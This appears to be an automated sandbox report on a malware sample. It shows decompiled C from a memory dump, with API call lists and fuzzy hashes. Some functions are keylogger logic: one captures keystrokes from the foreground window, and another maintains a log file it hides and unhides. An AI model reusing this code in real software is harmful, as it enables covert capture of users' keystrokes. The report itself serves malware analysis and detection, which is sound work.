				int _t66;
				void* _t68;
				char _t74;
				void* _t75;
				void* _t76;
				void* _t83;
				signed int _t141;
				signed int _t142;
				void* _t143;
				void* _t144;
				signed int _t145;

				_t131 = __edx;
				_t142 = _t141 & 0xfffffff8;
				_t145 = _t142;
				_t143 = _t142 - 0x464;
				_t83 = __ecx;
				_t136 = __ecx + 4;
				do {
					Sleep(0x1388);
					E00748BC0(_t83, _t131);
					_t131 = 0x79f724;
					if(E007474E4(_t145) != 0) {
						if(E00749DB5() == 0) {
							CreateDirectoryW(E00741EEB(0x7ac3c8), 0);
						}
						_t133 = _t83 + 0x60;
						_t34 = GetFileAttributesW(E00741EEB(_t83 + 0x60));
						_t148 = _t34 & 0x00000002;
						if((_t34 & 0x00000002) != 0) {
							SetFileAttributesW(E00741EEB(_t133), 0x80);
						}
						_t36 = E00741F95(E00741E49(0x7ac578, _t131, _t148, 0x12));
						_t149 =  *_t36;
						if( *_t36 != 0) {
							E007420D5(_t83,  &_v1124);
							_t38 = E00742489();
							E00745A7C( &_v1028, E00741F95(0x7ac560), _t38);
							_t42 = PathFileExistsW(E00741EEB(_t133));
							__eflags = _t42;
							if(_t42 != 0) {
								E007420D5(_t83,  &_v1100);
								_t65 = E00741EEB(_t133);
								_t131 =  &_v1100;
								_t66 = E007579DC(_t65,  &_v1100);
								__eflags = _t66;
								if(_t66 != 0) {
									_t68 = E00742489();
									E00741FD1( &_v1136,  &_v1100, _t136, E00745BA4(_t83,  &_v1028,  &_v1100,  &_v1076, E00741F95( &_v1100), _t68));
									E00741FC7();
								}
								E00741FC7();
							}
							__eflags = E00742489() + _t43;
							E00743436(E007420AB(_t83,  &_v1076, _t131, __eflags, E00741EEB(_t136), E00742489() + _t43));
							E00741FC7();
							_t49 = E00742489();
							E00745BA4(_t83,  &_v1040, _t131,  &_v1064, E00741F95( &_v1136), _t49);
							_t53 = E00741EEB(_t133);
							_t144 = _t143 - 0x18;
							E007420EC(_t83, _t144, _t131, __eflags,  &_v1076);
							E00757A4E(_t53);
							_t143 = _t144 + 0x18;
							E00741FC7();
							E00741FC7();
						} else {
							_t74 = E00741EEB(_t133);
							_t75 = E00742489();
							_t76 = E00741EEB(_t83 + 4);
							_t131 = _t75 + _t75;
							E00757947(_t76, _t75 + _t75, _t74, 1);
						}
						_t136 = _t83 + 4;
						E00749DC9(_t83, _t83 + 4, 0x79f724);
						if( *((char*)(E00741F95(E00741E49(0x7ac578, _t131, _t149, 0x13)))) != 0) {
							SetFileAttributesW(E00741EEB(_t133), 6);
						}
					}
				} while ( *((char*)(_t83 + 0x49)) != 0);
				return 0;
			}

0x00748c71
0x00748c74
0x00748c74
0x00748c77
0x00748c7e
0x00748c82
0x00748c85
0x00748c8a
0x00748c92
0x00748c97
0x00748ca5
0x00748cb7
0x00748cc6
0x00748cc6
0x00748ccc
0x00748cd7
0x00748cdd
0x00748cdf
0x00748cee
0x00748cee
0x00748d02
0x00748d07
0x00748d0a
0x00748d3d
0x00748d47
0x00748d5c
0x00748d69
0x00748d6f
0x00748d71
0x00748d77
0x00748d7e
0x00748d83
0x00748d89
0x00748d8e
0x00748d90
0x00748d96
0x00748db9
0x00748dc2
0x00748dc2
0x00748dcb
0x00748dcb
0x00748dd7
0x00748df0
0x00748df9
0x00748e02
0x00748e1b
0x00748e22
0x00748e27
0x00748e33
0x00748e3a
0x00748e3f
0x00748e46
0x00748e4f
0x00748d0c
0x00748d10
0x00748d18
0x00748d24
0x00748d29
0x00748d2d
0x00748d33
0x00748e54
0x00748e5e
0x00748e79
0x00748e85
0x00748e85
0x00748e79
0x00748e8b
0x00748e9d

APIs

Sleep.KERNEL32(00001388), ref: 00748C8A

Part of subcall function 00748BC0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00748C97), ref: 00748BF6
Part of subcall function 00748BC0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00748C97), ref: 00748C05
Part of subcall function 00748BC0: Sleep.KERNEL32(00002710,?,?,?,00748C97), ref: 00748C32
Part of subcall function 00748BC0: CloseHandle.KERNEL32(00000000,?,?,?,00748C97), ref: 00748C39

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00748CC6
GetFileAttributesW.KERNEL32(00000000), ref: 00748CD7
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00748CEE
PathFileExistsW.SHLWAPI(00000000,00000012), ref: 00748D69

Part of subcall function 007579DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0079F724), ref: 00748E85

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID:
API String ID: 3795512280-0
Opcode ID: 7d33c3d866e5de5c13360a2090b2ce5c536e39a30dd9177d4f760c84d0df7e81
Instruction ID: cbbf3fba6d3baef66fd6fd06c3200a731f33977a10e359a0983840d9fa81f4c4
Opcode Fuzzy Hash: 7d33c3d866e5de5c13360a2090b2ce5c536e39a30dd9177d4f760c84d0df7e81
Instruction Fuzzy Hash: E851B471604300DBCB19FB74886A9BF76A59FC1300F844919F5429B1D3DF2C9D4AC656

Uniqueness

Uniqueness Score: -1.00%

Function 00780FE4, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00780FE4(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				void* _v64;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				void* _t177;
				signed short* _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed int* _t183;
				signed int _t184;
				signed int** _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;

				_t149 = __ecx;
				_t86 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t86 ^ _t187;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t183 = _a20;
				_v32 = _t183;
				_t91 = _a8;
				if(_t91 == 0) {
					_t179 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t179 =  *(_t143 + 0x158);
					} else {
						_t179 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t194 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E00782338(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
					} else {
						_t129 = E0078247A(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t184 = 0;
							__eflags = 0;
							L18:
							_v28 = _t184;
							if(_t184 == 0) {
								L30:
								E00770BA0(0);
								_t183 = _v32;
								while(1) {
									L113:
									_t172 =  *_t179 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t183;
									if( *_t183 == 0) {
										L28:
										L29:
										return E0076FD1B(_v8 ^ _t187);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t179;
									_t144 = _t179;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t98 = E007803AE(_t145, _t153, _t179, _v52, _t97, _v48, _v40, _t183, _t145, _v32);
												_t188 = _t188 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E0077A504())) = 0x16;
													goto L29;
												}
												L112:
												_t179 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t179 =  &(_t179[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t183 =  *_t183 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t183;
													if( *_t183 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t183 =  *_t183 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t183;
												if( *_t183 <= 0) {
													goto L91;
												}
												_t180 = _v40;
												 *((short*)( *_t180)) =  *_t173;
												 *_t180 =  *_t180 + 2;
												 *_t183 =  *_t183 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t179 =  &(_t179[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t179 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t183;
												if( *_t183 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t179 =  &(_t179[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t183 =  *_t183 - 1;
												_t159 =  *_t179 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E0078CF51(_t145, _t179, _t183, _t179, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E0078CF51(_t145, _t179, _t183, _t179, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t179[3]);
											}
										} else {
											_t153 =  &(_t179[5]);
											_v28 =  &(_t179[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t203 = _v33;
							if(_v33 == 0) {
								_t133 = E00782338(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
							} else {
								_t133 = E0078247A(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
							}
							_t181 = _t184;
							_t177 = _t133 - 1;
							if(_t177 <= 0) {
								L27:
								E00770BA0(_t184);
								goto L28;
							} else {
								_t148 = _v32;
								_t185 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t181;
									_t181 = _t181 + 2;
									 *( *_t185) = _t135;
									 *_t185 =  &(( *_t185)[0]);
									 *_t148 =  *_t148 - 1;
									_t177 = _t177 - 1;
									if(_t177 > 0) {
										continue;
									}
									break;
								}
								_t184 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t186 = E0077F98C(_t165, _t137 & _t165);
							_v28 = _t186;
							_pop(_t165);
							__eflags = _t186;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t186 = 0xdddd;
							L14:
							_t184 = _t186 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E00790810();
						_t186 = _t188;
						_v28 = _t186;
						if(_t186 == 0) {
							goto L30;
						}
						 *_t186 = 0xcccc;
						goto L14;
					}
				}
			}

0x00780fe4
0x00780fec
0x00780ff3
0x00780ff9
0x00780ffc
0x00781003
0x00781006
0x0078100c
0x0078100f
0x00781013
0x00781016
0x0078101a
0x0078101d
0x00781034
0x0078101f
0x00781022
0x0078102c
0x00781024
0x00781024
0x00781024
0x00781022
0x00781041
0x00000000
0x00781047
0x00781050
0x00781057
0x00781061
0x00781064
0x0078106c
0x00781074
0x0078107c
0x00781083
0x00781089
0x00781090
0x00781092
0x007810a8
0x007810b6
0x00781094
0x007810a1
0x007810a1
0x007810bb
0x007810bf
0x00000000
0x007810c5
0x007810c5
0x007810c8
0x007810cd
0x007810d1
0x0078112b
0x0078112b
0x0078112d
0x0078112d
0x00781132
0x007811b2
0x007811b4
0x007811b9
0x00781430
0x00781430
0x00781430
0x00781433
0x00781436
0x00000000
0x00000000
0x007811c2
0x007811c5
0x0078119c
0x0078119e
0x007811b1
0x007811b1
0x007811c7
0x007811cb
0x007811cb
0x007811cd
0x007811d0
0x007811d2
0x007811d5
0x007811d5
0x007811d8
0x007811d9
0x007811d9
0x007811de
0x007811e1
0x007811e4
0x007811e7
0x007811ea
0x0078131f
0x0078131f
0x00781322
0x007813ef
0x007813ef
0x007813f2
0x0078140b
0x0078140f
0x0078140f
0x00781411
0x00781411
0x00781421
0x00781426
0x00781429
0x0078142b
0x00781446
0x00000000
0x0078144c
0x0078142d
0x0078142d
0x00000000
0x0078142d
0x007813f4
0x007813f4
0x007813f7
0x00000000
0x00000000
0x007813f9
0x007813f9
0x007813fc
0x00781401
0x00781404
0x00781407
0x00000000
0x00781407
0x00781328
0x00781328
0x0078132b
0x007813db
0x007813db
0x007813de
0x007813e7
0x007813eb
0x007813eb
0x00000000
0x007813eb
0x007813e0
0x007813e0
0x007813e3
0x00000000
0x00000000
0x00000000
0x007813e5
0x00781331
0x00781331
0x00781334
0x007813c7
0x007813c7
0x007813ca
0x007813d3
0x007813d7
0x007813d7
0x00000000
0x007813d7
0x007813cc
0x007813cc
0x007813cf
0x00000000
0x00000000
0x00000000
0x007813d1
0x0078133a
0x0078133a
0x0078133d
0x00781366
0x00781369
0x0078136d
0x00781377
0x0078136f
0x0078136f
0x0078136f
0x0078137d
0x00781380
0x0078139c
0x0078139c
0x0078139f
0x007813a2
0x00000000
0x00000000
0x007813a8
0x007813ab
0x007813ab
0x007813ae
0x00000000
0x00000000
0x007813b2
0x007813b5
0x007813b8
0x007813bb
0x007813bd
0x007813c0
0x007813c3
0x00000000
0x00000000
0x00000000
0x007813c5
0x00781382
0x00781382
0x00781385
0x00000000
0x00000000
0x00781387
0x0078138f
0x00781392
0x00781395
0x00781395
0x00000000
0x00781380
0x0078133f
0x00781342
0x00000000
0x00000000
0x00781349
0x00781349
0x0078134c
0x0078135f
0x00000000
0x0078135f
0x0078134f
0x0078134f
0x00781352
0x00000000
0x00000000
0x00781358
0x00000000
0x00781358
0x007811f0
0x007812ee
0x007812ee
0x007812f1
0x00781314
0x00781318
0x00781318
0x00000000
0x00781318
0x007812f3
0x007812f3
0x007812f6
0x00000000
0x00000000
0x007812f8
0x007812f8
0x007812fb
0x0078130d
0x00000000
0x0078130d
0x007812fd
0x007812fd
0x00781300
0x00000000
0x00000000
0x00781306
0x00000000
0x00781306
0x007811f6
0x007811f9
0x0078129b
0x0078129b
0x007812a0
0x007812a6
0x007812a6
0x007812a7
0x007812aa
0x007812b0
0x007812b3
0x007812b6
0x00000000
0x00000000
0x007812bc
0x007812bf
0x007812bf
0x007812c2
0x00000000
0x00000000
0x007812ca
0x007812cb
0x007812ce
0x007812d1
0x00000000
0x00000000
0x007812d9
0x007812dc
0x007812df
0x007812e1
0x007812e4
0x007812e7
0x00000000
0x00000000
0x00000000
0x007812e9
0x007812bf
0x00000000
0x007812aa
0x007811ff
0x00781202
0x00781217
0x0078121d
0x00781224
0x00781226
0x00781281
0x00781287
0x00781288
0x0078128a
0x0078128f
0x0078128f
0x00781228
0x00781228
0x0078122b
0x0078122b
0x00781292
0x00000000
0x00781292
0x00781204
0x00781207
0x00781261
0x00781261
0x00781264
0x00781270
0x00781274
0x00781274
0x00000000
0x00781274
0x00781266
0x00781266
0x00781269
0x00000000
0x00000000
0x00000000
0x0078126b
0x00781209
0x0078120c
0x00781230
0x00781230
0x00781233
0x00781256
0x0078125a
0x0078125a
0x00000000
0x0078125a
0x00781235
0x00781235
0x00781238
0x00000000
0x00000000
0x0078123a
0x0078123a
0x0078123d
0x0078124f
0x00000000
0x0078124f
0x0078123f
0x0078123f
0x00781242
0x00000000
0x00000000
0x00781248
0x00000000
0x00781248
0x0078120e
0x00781211
0x00000000
0x00000000
0x00000000
0x00781211
0x00000000
0x0078143c
0x00781134
0x0078113b
0x00781164
0x0078113d
0x0078114c
0x0078114c
0x0078116b
0x0078116d
0x00781170
0x00781195
0x00781196
0x00000000
0x00781172
0x00781172
0x00781175
0x00781178
0x0078117f
0x00781182
0x00781185
0x00781188
0x0078118b
0x0078118d
0x00781190
0x00000000
0x00000000
0x00000000
0x00781190
0x00781192
0x00000000
0x00781192
0x00781170
0x007810d8
0x007810da
0x007810dc
0x007810e4
0x00781109
0x0078110b
0x00781115
0x00781117
0x0078111a
0x0078111b
0x0078111d
0x00000000
0x00000000
0x00781123
0x00781104
0x00781104
0x00000000
0x00781104
0x007810e8
0x007810ec
0x007810f1
0x007810f3
0x007810f8
0x00000000
0x00000000
0x007810fe
0x00000000
0x007810fe
0x007810bf

APIs

__alloca_probe_16.LIBCMT ref: 007810EC
__freea.LIBCMT ref: 00781196
__freea.LIBCMT ref: 007811B4

Part of subcall function 00770BA0: _free.LIBCMT ref: 00770BB6

Strings

am/pm, xrefs: 00781217
a/p, xrefs: 0078127B

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: 14343051048124d5262d5e92a28a12b686e14a8ec4d0d511b87f56b1c56cce0a
Instruction ID: 84b2f08f4e875f693949a793100033d1bad5a51be36b8eed9c879c6235b96e97
Opcode Fuzzy Hash: 14343051048124d5262d5e92a28a12b686e14a8ec4d0d511b87f56b1c56cce0a
Instruction Fuzzy Hash: 64D14870990246CBCB24BF68C859BBAB7B9FF05300FA44159EA05DB641D33D9D83CB91

Uniqueness

Uniqueness Score: -1.00%

Function 007489BA, Relevance: 9.1, APIs: 6, Instructions: 54
keyboardthreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E007489BA(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;

				_t30 = __ecx;
				E00771F00(_t36,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
				E0074427F(_t30, _a4,  &_v40);
				return _a4;
			}

0x007489d1
0x007489d6
0x007489e3
0x007489e9
0x007489ea
0x007489ec
0x00748a00
0x00748a0a
0x00748a17
0x00748a33
0x00748a40
0x00748a4e

APIs

GetForegroundWindow.USER32(00000000,?,00000000), ref: 007489EE
GetWindowThreadProcessId.USER32(00000000,?), ref: 007489F9
GetKeyboardLayout.USER32 ref: 00748A00
GetKeyState.USER32(00000010), ref: 00748A0A
GetKeyboardState.USER32(?), ref: 00748A17
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00748A33

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 976d92967587331ccd6f1cb87d357d2f2da790c8e1dbdd0afe5b2561d8ba4870
Instruction ID: 27b0bb0af1c0eb5bec4c7ee5447fe5d8a37a7f8d4a42f2c08ce3bd9691666d90
Opcode Fuzzy Hash: 976d92967587331ccd6f1cb87d357d2f2da790c8e1dbdd0afe5b2561d8ba4870
Instruction Fuzzy Hash: 3D11527294020CBBDB10DBE4DC49FEA7BBCFB0C345F004456FA04E6150DA79AE558B64

Uniqueness

Uniqueness Score: -1.00%

Function 00781CE2, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00781CE2(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x7aa1e0; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E0077F348(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E007822DF(_t25, _t36, __eflags,  *0x7aa1e0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00781B54(_t25, _t31, 0x7ab654);
							E007801F5(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E007801F5();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E0077F949(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x7aa1e0; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E0077F348(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E007822DF(_t27, _t37, __eflags,  *0x7aa1e0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00781B54(_t27, _t32, 0x7ab654);
									E007801F5(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E007801F5();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00782289(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00782289(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00781ce2
0x00781ce2
0x00781ce2
0x00781cec
0x00781cee
0x00781cf3
0x00781cf6
0x00781d04
0x00781d0b
0x00781d10
0x00781d13
0x00781d16
0x00781d28
0x00781d2d
0x00781d2f
0x00781d3a
0x00781d41
0x00781d46
0x00781d49
0x00781d4b
0x00000000
0x00000000
0x00000000
0x00000000
0x00781d31
0x00781d31
0x00000000
0x00781d31
0x00781d18
0x00781d18
0x00781d19
0x00781d19
0x00781d1e
0x00781d59
0x00781d5a
0x00781d60
0x00781d65
0x00781d68
0x00781d69
0x00781d6a
0x00781d71
0x00781d73
0x00781d75
0x00781d7a
0x00781d7d
0x00781d8b
0x00781d97
0x00781d9a
0x00781d9d
0x00781daf
0x00781db4
0x00781db6
0x00781dc1
0x00781dc7
0x00781dcf
0x00781dd1
0x00000000
0x00000000
0x00000000
0x00000000
0x00781db8
0x00781db8
0x00000000
0x00781db8
0x00781d9f
0x00781d9f
0x00781da0
0x00781da0
0x00781dd3
0x00781dd4
0x00781dd4
0x00781d7f
0x00781d85
0x00781d89
0x00781ddc
0x00781ddd
0x00781de3
0x00000000
0x00000000
0x00000000
0x00781d89
0x00781dea
0x00781dea
0x00781cf8
0x00781cfe
0x00781d02
0x00781d4d
0x00781d4e
0x00781d58
0x00000000
0x00000000
0x00000000
0x00781d02

APIs

GetLastError.KERNEL32(00000000,?,00775545,?,?,?,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781CE6
_free.LIBCMT ref: 00781D19
_free.LIBCMT ref: 00781D41
SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D4E
